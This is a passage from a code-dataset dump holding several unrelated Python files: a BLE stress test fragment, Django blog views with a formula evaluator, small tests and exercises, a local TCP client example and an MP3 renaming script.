self.scn_ad.droid.bleSetScanSettingsCallbackType(\n ScanSettingsCallbackType.CALLBACK_TYPE_FOUND_AND_LOST.value)\n self.scn_ad.droid.bleSetScanSettingsMatchMode(\n ScanSettingsMatchMode.AGGRESIVE.value)\n self.scn_ad.droid.bleSetScanSettingsNumOfMatches(\n ScanSettingsMatchNum.MATCH_NUM_ONE_ADVERTISEMENT.value)\n scan_settings = self.scn_ad.droid.bleBuildScanSetting()\n scan_callback = self.scn_ad.droid.bleGenScanCallback()\n self.scn_ad.droid.bleBuildScanFilter(filter_list)\n self.scn_ad.droid.bleStartBleScan(filter_list, scan_settings,\n scan_callback)\n self.active_scan_callback_list.append(scan_callback)\n on_found_count = 0\n on_lost_count = 0\n time.sleep(60)\n from contextlib import suppress\n for x in 
range(1000):\n adv_callback = self._start_generic_advertisement_include_device_name(\n )\n with suppress(Exception):\n event = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 3)\n if event['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event['data']['CallbackType'] == 4:\n on_lost_count += 1\n self.adv_ad.droid.bleStopBleAdvertising(adv_callback)\n with suppress(Exception):\n event2 = self.scn_ad.ed.pop_event(\n self.scan_result.format(scan_callback),\n self.default_timeout * 4)\n if event2['data']['CallbackType'] == 2:\n on_found_count += 1\n elif event2['data']['CallbackType'] == 4:\n on_lost_count += 1\n thread.join()\n thread2.join()\n return True\n","sub_path":"android/tools/test/connectivity/acts/tests/google/ble/system_tests/BleOnLostOnFoundStressTest.py","file_name":"BleOnLostOnFoundStressTest.py","file_ext":"py","file_size_in_byte":9786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"462796374","text":"from django import forms\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.views import generic\nfrom .models import Post, Comment\nfrom django_filters import rest_framework as filters\n# convert from infix notation to prefix notation\ndef infix_to_prefix(INPUTED_TEXT):\n buffer = []\n stack = []\n for token in INPUTED_TEXT:\n if token == '(' or token == 'c' or token == 's' or token == 't':\n stack.append(token)\n elif token == ')':\n while len(stack) > 0:\n te = stack.pop()\n if te == '(':\n break\n else:\n buffer.append(te)\n if len(stack) > 0:\n if stack[-1] == 'c' or stack[-1] == 's' or stack[-1] == 't':\n buffer.append(stack.pop())\n elif token == '*' or token == '/':\n while len(stack) > 0:\n if stack[-1] == '*' or stack[-1] == '/':\n buffer.append(stack.pop())\n else:\n break\n stack.append(token)\n elif token == '+' or token == '-':\n while len(stack) > 0:\n if stack[-1] == '*' or stack[-1] == '/' or stack[-1] == '+' or stack[-1] == '-':\n buffer.append(stack.pop())\n else:\n break\n stack.append(token)\n else:\n buffer.append(token)\n\n while len(stack) > 0:\n buffer.append(stack.pop())\n return buffer\n#print(INPUTED_TEXT)\n#print(\"\".join(buffer))\n# evaluate the converted expression and output the result\ndef RPN(states,parent,children,type):\n '''\n Evaluate an expression in reverse Polish notation\n '''\n operator = {\n '+': (lambda x, y: x + y),\n '-': (lambda x, y: x - y),\n '*': (lambda x, y: x * y),\n '/': (lambda x, y: float(x) / y)\n }\n stack = []\n #print('RPN: %s' % states)\n for index, z in enumerate(states):\n if z not in operator.keys():\n if type==0:\n obj = Comment.objects.filter(parent=parent,sub_name=z).first()\n elif type==1:\n obj = Comment.objects.filter(post=parent,sub_name=z).first()\n stack.append(obj.value)\n continue\n y = stack.pop()\n x = stack.pop()\n stack.append(operator[z](x, y))\n #print('%s %s %s =' % (x, z, y))\n #print(stack[0])\n\n #obj = Comment.objects.filter(pk=comment_pk)\n return stack[0]\n\nclass PostList(generic.ListView):\n \"\"\"Post list\"\"\"\n model = Post\n\n\nclass PostDetail(generic.DetailView):\n \"\"\"Post detail\"\"\"\n model = Post\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n #context['result'] = 20000.0\n # fetch comments that are not tied to any other comment, i.e. comments on the post itself\n context['comment_list'] = self.object.comment_set.filter(parent__isnull=True)\n with_formula_list = self.object.comment_set.filter(formula__isnull=False).order_by(\"-depth\")\n if len(self.object.comment_set.filter(value__isnull=True, formula__isnull=True))==0:\n try:\n num=len(with_formula_list)\n for i in 
range(num):\n for fml in with_formula_list:\n children = self.object.comment_set.filter(parent=fml)\n fml.value=RPN(infix_to_prefix(fml.formula),fml,children,0)\n print(fml.value)\n fml.save()\n\n self.object.value = RPN(infix_to_prefix(self.object.formula),self.object.pk,context['comment_list'],1)\n self.object.save()\n except:\n self.object.value=None\n self.object.save()\n else:\n self.object.value=None\n self.object.save()\n # If the post has a value, pass it to the HTML template for output\n if self.object.value:\n context['result']=self.object.value\n return context\nclass PostCreate(generic.CreateView):\n model = Post\n fields=[\"title\"]\nclass PostDelete(generic.DeleteView):\n model = Post\n success_url = \"/\"\n\n# Comment and reply forms\nCommentForm = forms.modelform_factory(Comment, fields=('text', ))\nclass PostUpdate(forms.ModelForm):\n # create meta class\n class Meta:\n # specify model to be used\n model = Post\n\n # specify fields to be used\n fields = [ \"formula\"]\nclass UpdateForm(forms.ModelForm):\n # create meta class\n class Meta:\n # specify model to be used\n model = Comment\n\n # specify fields to be used\n fields = [ \"formula\"]\nclass UpdateFormNum(forms.ModelForm):\n # create meta class\n class Meta:\n # specify model to be used\n model = Comment\n\n # specify fields to be used\n fields = [ \"value\"]\ndef comment_create(request, post_pk):\n \"\"\"Create a comment on an article\"\"\"\n post = get_object_or_404(Post, pk=post_pk)\n form = CommentForm(request.POST or None)\n\n if request.method == 'POST':\n comment = form.save(commit=False)\n comment.post = post\n comment.depth = 1\n comment.save()\n return redirect('blog:post_detail', pk=post.pk)\n\n context = {\n 'form': form,\n 'post': post\n }\n return render(request, 'blog/comment_form.html', context)\n\ndef post_update(request, post_pk):\n obj = get_object_or_404(Post, pk=post_pk)\n form = UpdateForm(request.POST or None, instance = obj)\n context = {\n 'form': form,\n }\n context['children'] = Comment.objects.all().filter(post=obj.id, parent__isnull=True)\n dictionary = []\n d=dict()\n for child in context['children']:\n obj_child = get_object_or_404(Comment, post=post_pk,text=child)\n obj_child.sub_name = chr(ord('a')+len(dictionary))\n obj_child.save()\n dictionary.append([chr(ord('a')+len(dictionary))+\":\",child])\n d[chr(ord('a')+len(d))]=child\n context['dict']=dictionary\n if request.method == 'POST':\n form.save()\n fmla = list(str(obj.formula))\n fmla_out=\"\"\n for i in fmla:\n try:\n if d[i]:\n fmla_out=fmla_out+str(d[i])\n except:\n fmla_out=fmla_out+i\n obj.formula_out = fmla_out\n obj.save()\n \"\"\"Run the calculation\"\"\"\n \"\"\"\n with_value_list = Comment.objects.all().filter(post=post_pk,value__isnull=False)\n for l in with_value_list:\n parent_list = Comment.objects.all().filter(post=post_pk,pk=l)\n \"\"\"\n return redirect('blog:post_detail', pk=obj.pk)\n return render(request, 'blog/formula_update_form.html', context)\n\n\ndef comment_update(request, post_pk, comment_pk):\n obj = get_object_or_404(Comment, pk=comment_pk)\n form = UpdateForm(request.POST or None, instance = obj)\n context = {\n 'form': form,\n }\n context['children'] = Comment.objects.all().filter(parent=comment_pk)\n dictionary = []\n d=dict()\n for child in context['children']:\n obj_child = get_object_or_404(Comment, post=post_pk,text=child)\n obj_child.sub_name = chr(ord('a')+len(dictionary))\n obj_child.save()\n dictionary.append([chr(ord('a')+len(dictionary))+\":\",child])\n d[chr(ord('a')+len(d))]=child\n context['dict']=dictionary\n if request.method == 'POST':\n form.save()\n fmla = 
list(str(obj.formula))\n fmla_out=\"\"\n for i in fmla:\n try:\n if d[i]:\n fmla_out=fmla_out+str(d[i])\n except:\n fmla_out=fmla_out+i\n obj.formula_out = fmla_out\n obj.save()\n return redirect('blog:post_detail', pk=obj.post.pk)\n return render(request, 'blog/formula_update_form.html', context)\n\n\n\n\ndef comment_update_num(request, post_pk, comment_pk):\n obj = get_object_or_404(Comment, pk=comment_pk)\n form = UpdateFormNum(request.POST or None, instance = obj)\n\n if request.method == 'POST':\n form.save()\n return redirect('blog:post_detail', pk=obj.post.pk)\n\n context = {\n 'form': form\n }\n return render(request, 'blog/num_update_form.html', context)\ndef reply_create(request, comment_pk):\n \"\"\"Reply to a comment\"\"\"\n comment = get_object_or_404(Comment, pk=comment_pk)\n post = comment.post\n form = CommentForm(request.POST or None)\n\n if request.method == 'POST':\n reply = form.save(commit=False)\n reply.parent = comment\n reply.post = post\n reply.depth = reply.parent.depth + 1\n reply.save()\n return redirect('blog:post_detail', pk=post.pk)\n\n context = {\n 'form': form,\n 'post': post,\n 'comment': comment,\n }\n return render(request, 'blog/comment_form.html', context)\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547380525","text":"from two_num_sum import TwoNumSumSlowTest\nfrom two_num_sum import TwoNumSumFastTest\n\ndef testTrueOrFalse(twoNumSum, trueOrFalse, vals):\n for val in vals:\n assert twoNumSum.test(val) is trueOrFalse\n\ntest1 = [1, -2, 3, 6]\ntrues = [4, -1, 9]\nfalses = [10, 5, 0]\n\nslow = TwoNumSumSlowTest()\nslow.store_multiple(test1)\n\ntestTrueOrFalse(slow, True, trues)\ntestTrueOrFalse(slow, False, falses)\n\nfast = TwoNumSumFastTest()\nfast.store_multiple(test1)\n\ntestTrueOrFalse(fast, True, trues)\ntestTrueOrFalse(fast, False, falses)\n\nprint(\"Testing: GOOD\")\n","sub_path":"two_num_sum/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"75833669","text":"import os\nfrom utils import PRODUCED_DATASETS\nfrom utils.IBGETools import pop_ibge\n \n \ndef test_ibge_download():\n path = os.path.join(PRODUCED_DATASETS, 'estimativa_2013_dou_xls.zip')\n if os.path.exists(path):\n os.remove(path)\n df = pop_ibge()\n assert list(df.columns) == ['SIGLA', 'NOME', '2008', '2009', '2010', '2011', '2012',\n '2013', '2014', '2015', '2016', '2017', '2018']\n ","sub_path":"v1/tests/test_IBGETools.py","file_name":"test_IBGETools.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"130067433","text":"def given_word(x, word, case_sensitive = False):\n if case_sensitive:\n term = word.split(x)\n else:\n term = word.lower().split(x.lower())\n result = ''\n valid = ''\n if len(term)<2:\n return 0\n\n valid = term[1]\n if len(term)>2:\n for t in term:\n if t != '' and t[-1] in '1234567890':\n valid = t\n\n for c in valid:\n if c in '1234567890.':\n result = result + c\n else:\n break\n if len(result) == 0:\n return 0\n if '.' in result:\n return float(result)\n return int(result)\n \n\ndef word_by_word(message):\n results = []\n key = ''\n value = ''\n for c in message:\n if c not in '1234567890.':\n if value != '' and key !='':\n type = 'integer'\n if '.' 
in value:\n try:\n value = float(value)\n except:\n value = 0.0\n type = 'float'\n else:\n value = int(value)\n results.append({ \"key\":key, \"value\":value, \"type\": type})\n value = ''\n key = ''\n key = key + c\n else:\n if key == '':\n value = c\n else:\n value += c\n if key !='':\n type = 'integer'\n if value =='':\n value = 0\n elif '.' in value:\n try:\n value = float(value)\n except:\n value = 0.0\n type = 'float'\n else:\n value = int(value)\n results.append({ \"key\":key, \"value\":value, \"type\": type})\n return results\n\n\ndef print_results(results):\n print('─'*80)\n print(f'{\"KEY\":20}{\"VALUE\":20}TYPE')\n print('─'*80)\n\n for result in results:\n print(f'{result[\"key\"]:20}{str(result[\"value\"]):20}{result[\"type\"]}')\n\n\nif __name__ == \"__main__\":\n message = input(\"Input a string to decode:\")\n decoded = word_by_word(message)\n print_results(decoded)\n\n\n","sub_path":"decode.py","file_name":"decode.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"446999891","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('',views.base, name='base.html'),\n path('contact/',views.contact, name='contact.html'),\n path('newpost/',views.newpost, name='new-post.html'),\n path('wantajob/',views.wantajob, name='job-post.html'),\n path('login/',views.login, name='login.html'),\n path('signup/',views.signup, name='signup.html'),\n path('register/',views.register, name='signup.html'),\n path('userlogin/',views.userlogin, name='login.html'),\n path('profile/',views.profile, name='profile.html'),\n path('forget/', views.forget, name='forget'),\n path('sendmail/', views.sendmail, name='sendmail'),\n path('confirmm/', views.confirmm, name='confirmm'),\n]\n","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"539588587","text":"# importing webbrowser from python standard library\r\nimport webbrowser\r\n\r\nclass Movie():\r\n \"\"\"A class of Movies\r\n Movie class which stores information regarding the movie and then calls a method\r\n for showing its trailer\r\n\r\n Attributes:\r\n title = Title of the movie\r\n storyline = Brief storyline for the movie\r\n poster_image_url = URL for a poster image for the movie\r\n trailer_youtube_url = URL for a youtube trailer for the movie\r\n rating = IMDB rating for the movie\r\n \"\"\"\r\n\r\n def __init__(self, movie_title, movie_storyline, poster_image, trailer_youtube, imdb_rating):\r\n \"\"\"Inits Movie with variables movie title, movie storyline, poster image,\r\n trailer youtube and imdb rating\"\"\"\r\n self.title = movie_title\r\n self.storyline = movie_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n self.rating = imdb_rating\r\n\r\n def show_trailer(self):\r\n \"\"\"Opens a movie's trailer in the web browser when passed a Movie instance\r\n Args:\r\n Self: The Movie instance for which to open the movie trailer\r\n Returns:\r\n Opens a movie trailer in the web browser\r\n \"\"\"\r\n webbrowser.open(self.trailer_youtube_url)\r\n \r\n","sub_path":"Movie trailer website/media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"560138786","text":"# Wrong answer on example 2\n# t = int(input())\n# for _ in 
range(t):\n# stack = []\n# vps = list(input())\n# for s in vps:\n# if s == \"(\":\n# stack.append(1)\n# elif s == \")\":\n# stack.append(-1)\n# if sum(stack) == 0:\n# print(\"YES\")\n# else:\n# print(\"NO\")\n\n# has to be done with pop\n\nt = int(input())\nfor _ in range(t):\n stack = []\n vps = list(input())\n for s in vps:\n if s == \"(\":\n stack.append(0)\n elif s == \")\":\n if stack:\n del stack[-1]\n else:\n stack.append(-1)\n break\n if len(stack) == 0:\n print(\"YES\")\n else:\n print(\"NO\")\n","sub_path":"Python/DAYOUNG/17_스택/3_괄호.py","file_name":"3_괄호.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"43169925","text":"import pytest\n\nfrom nb2report.cell_utils import *\n\n\ndef test_assert_is_cell():\n cell1 = {'cell_type': 'whatever', 'source': ['whatever']}\n cell2 = {'cell_type': 'whatever', 'source': ['whatever'], 'a': 2}\n cell3 = {'cell_type': 'whatever', 'source': ['whatever', 'w2']}\n\n assert assert_cell(cell1) is True\n assert assert_cell(cell2) is True\n assert assert_cell(cell3) is True\n\n\n@pytest.mark.xfail(raises=AssertionError)\ndef test_not_assert_is_cell():\n cell4 = {'cell_type': 'whatever', 'source': 'whatever'}\n cell5 = {'cell_type': 2, 'source': ['whatever']}\n cell6 = {'source': ['whatever']}\n cell7 = {'cell_type': 'whatever'}\n\n assert assert_cell(cell4) is False\n assert assert_cell(cell5) is False\n assert assert_cell(cell6) is False\n assert assert_cell(cell7) is False\n\n\ndef test_is_assert():\n cell1 = {'cell_type': 'whatever', 'source': '# asserts'}\n cell2 = {'cell_type': 'whatever', 'source': '# AssertS'}\n cell3 = {'cell_type': 'whatever', 'source': '--_-# assertsaaaA'}\n cell4 = {'cell_type': 'whatever', 'source': '--_-# AsSErtsaaaA'}\n cell5 = {'cell_type': 'whatever', 'source': '# '}\n cell6 = {'cell_type': 'whatever', 'source': ''}\n cell7 = {'cell_type': 'whatever', 'source': 'gsfdgsa'}\n\n assert is_assert(cell1) is True\n assert is_assert(cell2) is True\n assert is_assert(cell3) is True\n assert is_assert(cell4) is True\n assert is_assert(cell5) is False\n assert is_assert(cell6) is False\n assert is_assert(cell7) is False\n\n\ndef test_is_list():\n assert is_list({\n 'cell_type': 'markdown',\n 'source': [\"*\"]\n }) is True\n\n assert is_list({\n 'cell_type': 'markdown',\n 'source': [\"0\"]\n }) is False\n\n assert is_list({\n 'cell_type': 'markdown',\n 'source': [\"\"]\n }) is False\n\n\ndef test_is_title():\n assert is_title({\n 'cell_type': 'markdown',\n 'source': [\"#\"]\n }) is True\n\n assert is_title({\n 'cell_type': 'markdown',\n 'source': [\"_\"]\n }) is False\n\n assert is_title({\n 'cell_type': 'markdown',\n 'source': [\"\"]\n }) is False\n\n\ndef test_is_markdown():\n cell1 = {'cell_type': 'markdown', 'source': ['whatever']}\n cell2 = {'cell_type': 'marKdown', 'source': ['whatever']}\n cell3 = {'cell_type': '', 'source': ['whatever']}\n\n assert is_markdown(cell1) is True\n assert is_markdown(cell2) is False\n assert is_markdown(cell3) is False\n\n\ndef test_is_code():\n cell1 = {'cell_type': 'code', 'source': ['whatever']}\n cell2 = {'cell_type': 'coDe', 'source': ['whatever']}\n cell3 = {'cell_type': '', 'source': ['whatever']}\n\n assert is_code(cell1) is True\n assert is_code(cell2) is False\n assert is_code(cell3) is False\n\n\ndef test_get_first_line():\n cell = {'cell_type': 'code', 'source': ['whatever', 'no']}\n\n assert get_first_line(cell) == 'whatever'\n\n\ndef test_get_output():\n cell1 = {\n 'cell_type': 'code',\n 
'execution_count': 3,\n 'metadata': {},\n 'outputs': [\n {'data': {'text/plain': 'True'},\n 'execution_count': 3,\n 'metadata': {},\n 'output_type': 'execute_result'}\n ],\n 'source': ['True == True']\n }\n\n cell2 = {\n 'cell_type': 'code',\n 'execution_count': 3,\n 'metadata': {},\n 'outputs': [],\n 'source': ['True == True']\n }\n\n assert get_output(cell1) == 'True'\n assert get_output(cell2) == 'False'\n","sub_path":"tests/test_cell_utils.py","file_name":"test_cell_utils.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324504357","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTCP Client Example\n\nCopyright (c) 2017 - Michael Kessel (mailto: the.rocketredneck@gmail.com)\na.k.a. RocketRedNeck, RocketRedNeck.com, RocketRedNeck.net \n\nRocketRedNeck and MIT Licenses \n\nRocketRedNeck hereby grants license for others to copy and modify this source code for \nwhatever purpose other's deem worthy as long as RocketRedNeck is given credit where \nwhere credit is due and you leave RocketRedNeck out of it for all other nefarious purposes. \n\nPermission is hereby granted, free of charge, to any person obtaining a copy \nof this software and associated documentation files (the \"Software\"), to deal \nin the Software without restriction, including without limitation the rights \nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell \ncopies of the Software, and to permit persons to whom the Software is \nfurnished to do so, subject to the following conditions: \n\nThe above copyright notice and this permission notice shall be included in all \ncopies or substantial portions of the Software. \n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE \nSOFTWARE. 
\n****************************************************************************************************\n\"\"\"\nimport argparse\nimport socket\nimport time\n\ndefault_ipaddr = '127.0.0.1' # loopback\ndefault_port = 54321\ndefault_rcvsize = 48*1024\n\nparser = argparse.ArgumentParser(description='TCP Client Example')\nparser.add_argument('--addr', \n default=default_ipaddr,\n type=str, \n help=f'Interface Address (default={default_ipaddr})')\nparser.add_argument('--port',\n default=default_port,\n type=int, \n help=f'Receiving Port (default={default_port})')\nparser.add_argument('--size',\n default=default_rcvsize,\n\t\t\t\t\ttype=int,\n\t\t\t\t\thelp=f'Socket Receive Size (default={default_rcvsize})')\nparser.add_argument('--delay',\n default=0,\n type=float, \n help=f'delay (busy wait) every --delaymod frames (default = 0)')\nparser.add_argument('--delaymod',\n default=1,\n type=int, \n help=f'modulo when to apply --delay when delay > 0 (default = 1)')\n\nargs = parser.parse_args()\n\nIF_ADDR = args.addr\nPORT = args.port\n\ndef find(s, ch):\n return [i for i, ltr in enumerate(s) if ltr == ch]\n\nwhile (True):\n connectionSocket = socket.socket(family=socket.AF_INET,\n type=socket.SOCK_STREAM,\n proto=socket.IPPROTO_TCP)\n \n if (connectionSocket is None):\n print(\"Unable to create listen socket\")\n break\n \n print(\"Waiting for server...\")\n \n try:\n connectionSocket.connect((IF_ADDR, PORT))\n connectionSocket.settimeout(1.0)\n #connectionSocket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, args.size)\n #print(connectionSocket.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF))\n \n print(\"Connected!\")\n \n connectionSocket.send(b'Go')\n \n prefix_data = ''\n count = 0\n lostcount = 0\n\n starttime_sec = time.time()\n lasttime_sec = starttime_sec\n nexttime_sec = starttime_sec + 1.0\n lastcount = 0\n avgips = 0.0\n lasttermtime_sec = 0.0\n\n display = False\n\n while (True):\n try:\n data = connectionSocket.recv(args.size)\n data = prefix_data + data.decode(\"utf-8\")\n if (data == ''):\n break\n \n # because the data is a stream of information\n # we must parse it ourselves\n # In this example we are using the '*' character\n # as a delimiter\n terminators = find(data,'*')\n\n # If the last byte is not '*' then we need to hold\n # the remaining data for prepending the next part\n # of the stream\n if terminators != []:\n lasttermtime_sec = time.time()\n if data[-1] != '*':\n # Strip trailing data for next receive frame\n prefix_data = data[terminators[-1]+1:]\n data = data[:terminators[-1]+1]\n\n starts = [0] + [x+1 for x in terminators[:-1]]\n for i in range(len(starts)):\n bang = data[starts[i]:].find('!')\n msg = data[starts[i]:starts[i]+bang]\n if (msg == ''):\n break\n gt = msg.find('<')\n sn = int(msg[:gt])\n count = count + 1\n\n now_sec = time.time()\n if (now_sec >= nexttime_sec):\n nexttime_sec += 1.0\n \n dt = now_sec - lasttime_sec\n lasttime_sec = now_sec\n if (dt > 0.0):\n avgips = float(count - lastcount)/dt\n else:\n avgips = 0.0\n lastcount = count\n\n display = True\n\n if count == 1:\n lastsn = sn\n elif lastsn != sn - 1:\n #print(\" SKIP DETECTED!!!\")\n lostcount += (sn - lastsn - 1)\n\n if display:\n display = False\n print(f'{sn} <----- : lost = {lostcount} ({100*lostcount/sn:3.0f} %) : ({avgips:6.0f} Hz)')\n lastsn = sn\n else:\n if (time.time() - lasttermtime_sec >= 1.0):\n print(\"Timeout...\")\n break\n else:\n # Keep waiting for more data until terminator seen (indicating we have a complete 'message')\n prefix_data = data\n \n except socket.timeout:\n
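# recv() timed out (settimeout(1.0) above): no bytes arrived within a second, so report it and keep polling the socket\n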
print(\"Timeout...\")\n except Exception as e:\n print(e)\n break\n \n except Exception as e:\n print(e)\n\n connectionSocket.close()\n \n \n \n \n \n ","sub_path":"TCP_ClientExample.py","file_name":"TCP_ClientExample.py","file_ext":"py","file_size_in_byte":6922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648719459","text":"def computepay(hours, rate):\n #print('In computepay', hours, rate)\n if hours>40:\n print('Overtime')\n reg=rate*hours\n otp=(hours-40)*(rate*.5)\n pay=otp+reg\n else:\n print('Regular')\n pay=hours*rate\n return pay\n\nsh=input('Enter Hours:')\nsr=input('Enter Rate:')\nfh=float(sh)\nfr=float(sr)\n#print(fh, fr)\nxp=computepay (fh,fr)\n\nprint ('Pay:',xp)\n","sub_path":"py4e/ex.04.06/ex.04.06.py","file_name":"ex.04.06.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142196845","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on Apr 20, 2015\n\n@author: boldkhuu\n'''\nimport os\nimport sys\nimport argparse\nfrom mutagen.mp3 import EasyMP3\n\n\nOPTIONS = {\n 'help': '--help',\n 'rename': '--rename'\n}\n\nALLOWED_EXTENSIONS = ['.mp3']\n\n\ndef main(argv):\n try:\n dispatcher(argv)\n except KeyboardInterrupt:\n print('Program stopped by the user.')\n\n\ndef dispatcher(argv):\n parser = argparse.ArgumentParser()\n\n # Arguments\n parser.add_argument('-r', '--rename',\n type=str, nargs='+', metavar='directory',\n help='rename mp3 files in these folders')\n\n args = parser.parse_args()\n if args.rename:\n renameFilesInFolder(args.rename)\n\n\ndef renameFilesInFolder(directories):\n for directory in directories:\n if not os.path.exists(directory):\n print(\"ERROR: {}: directory doesn't exist.\".format(directory))\n continue\n for root, subdirs, files in os.walk(directory.decode('utf-8')):\n for file in files:\n extension = os.path.splitext(file)[1]\n if extension in ALLOWED_EXTENSIONS:\n path = os.path.join(root, file)\n audio = EasyMP3(path)\n\n artist = audio['artist'][0]\n number = audio['tracknumber'][0].split('/')[0]\n if len(number) == 1:\n number = '0{}'.format(number)\n title = audio['title'][0]\n\n filename = u\"{} - {} - {}{}\".format(\n number, artist, title, extension)\n newPath = os.path.join(root, filename)\n\n os.rename(path, newPath)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"organize.py","file_name":"organize.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"131072939","text":"'''\nBCBGSO Basic Python workshop 3/23/2018\nExercise 2\n\n@author urmi\n'''\n\n\n#Don't change this\ncodons=['TTT','TTG','CTC','ATT','ATG','GTA','TAC','TAA','TAG','CAT','CAC','CAA','AAC','AAG','GAT','TGC','TGA','TGG','CGA','AGC','AGG','GGG','YYPQ','SDEH','PSDL']\n'''\nA codon is fundamental unit of the genetic code, defined as sequence of three nucleotides\nGiven above, \"codons\" is a list containg some of the 64 total codons.\nFor the following questions change the list using your code and not by editing the list declaration\n'''\n#1. The last three elements in the list are not codons. Remove these from the codon list\n\n#2. Add the codons 'GGT', 'TTC' and 'TTA' to the list\n\n#3. 
How many codons are there in the list\n\n#Don't change this\npeptide='MEEPQSDPSVEPPLSQETFSDLWKLLPENNVLSPLPSQAMDDLMLSPDDIEQWFTEDPGPDEAPRMPEAAPPVAPAPAAPTPAAPAPAPSWPLSSSVPSQKTYQGSYGFRLGFLHSGTAKSVTCTYSPALNKMFCQLAKTCPVQLWVDSTPPPGTRVRAMAIYKQSQHMTEVVRRCPHHERCSDSDGLAPPQHLIRVEGNLRVEYLDDRNTFRHSVVVPYEPPEVGSDCTTIHYNYMCNSSCMGGMNRRPILTIITLEDSSGNLLGRNSFEVRVCACPGRDRRTEEENLRKKGEPHHELPPGSTKRALPNNTSSSPQPKKKPLDGEYFTLQDQTSFQKENC'\n'''\nA protein sequence is written by writing individual amino acids,represented by single letters, in a particular order.\nThe variable \"peptide\" contains the protein sequence for the human tumor protein p53. This protein acts as a tumor suppressor by regulating cell division.\n'''\n\n#4. Find out how many unique amino acids are present in the human tumor protein p53. Hint use set()\n\n\n#Don't change this\n#Thanks Yuan Wang, BCB for the dict code\ngeneticCode = {\"UUU\":\"F\", \"UUC\":\"F\", \"UUA\":\"L\", \"UUG\":\"L\",\n \"UCU\":\"S\", \"UCC\":\"s\", \"UCA\":\"S\", \"UCG\":\"S\",\n \"UAU\":\"Y\", \"UAC\":\"Y\", \"UAG\":\"STOP\",\n \"UGU\":\"C\", \"UGC\":\"C\", \"UGA\":\"STOP\", \"UGG\":\"W\",\n \"CUU\":\"L\", \"CUC\":\"L\", \"CUA\":\"L\", \"CUG\":\"L\",\n \"CCU\":\"P\", \"CCC\":\"P\", \"CCA\":\"P\", \"CCG\":\"P\",\n \"CAU\":\"H\", \"CAC\":\"H\", \"CAA\":\"Q\", \"CAG\":\"Q\",\n \"CGU\":\"R\", \"CGC\":\"R\", \"CGA\":\"R\", \"CGG\":\"R\",\n \"AUU\":\"I\", \"AUC\":\"I\", \"AUA\":\"I\", \"AUG\":\"M\",\n \"ACU\":\"T\", \"ACC\":\"T\", \"ACA\":\"T\", \"ACG\":\"T\",\n \"AAU\":\"N\", \"AAC\":\"N\", \"AAA\":\"K\", \"AAG\":\"K\",\n \"AGU\":\"S\", \"AGC\":\"S\", \"AGA\":\"R\", \"AGG\":\"R\",\n \"GUU\":\"V\", \"GUC\":\"V\", \"GUA\":\"V\", \"GUG\":\"V\",\n \"GCU\":\"A\", \"GCC\":\"A\", \"GCA\":\"A\", \"GCG\":\"A\",\n \"GAU\":\"D\", \"GAC\":\"D\", \"GAA\":\"E\", \"GAG\":\"E\",\n \"GGU\":\"G\", \"GGC\":\"G\", \"GGA\":\"G\", }\n\n'''\nAbove \"geneticCode\" is a dict which maps an RNA codon to an amino acid letter.\n'''\n\n#5. Print how many entries are the in the dict\n\n#6. 
